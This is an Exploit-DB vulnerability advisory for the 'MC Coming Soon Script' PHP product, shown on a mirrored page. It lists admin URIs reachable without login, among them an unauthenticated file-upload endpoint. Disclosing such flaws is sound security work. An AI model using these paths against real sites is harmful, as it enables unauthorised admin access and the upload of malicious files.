MC Coming Soon Script – Arbitrary File Upload / Improper Access Restrictions

  • 作者: Ihsan Sencan
    日期: 2017-01-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41070/
  • # # # # # 
    # Vulnerability: Improper Access Restrictions
    # Date: 15.01.2017
    # Vendor Homepage: http://microcode.ws/
    # Script Name: MC Coming Soon Script
    # Script Buy Now: http://microcode.ws/product/mc-coming-soon-php-script/3880
    # Author: İhsan Şencan
    # Author Web: http://ihsan.net
    # Mail : ihsan[beygir]ihsan[nokta]net
    # # # # # 
    # Direct entrance..
    # An attacker can exploit this issue via a browser.
    # The following example URIs are available:
    # 
    # http://localhost/[PATH]/admin/slider.php
    # file.php upload 
    # http://localhost/[PATH]/admin/imageslider/file.php
    # 
    # http://localhost/[PATH]/admin/launch_time.php
    # http://localhost/[PATH]/admin/launch_message.php
    # http://localhost/[PATH]/admin/send_message.php
    # http://localhost/[PATH]/admin/subscribers.php
    # http://localhost/[PATH]/admin/settings.php
    # http://localhost/[PATH]/admin/users.php
    # Vs.......
    # # # # #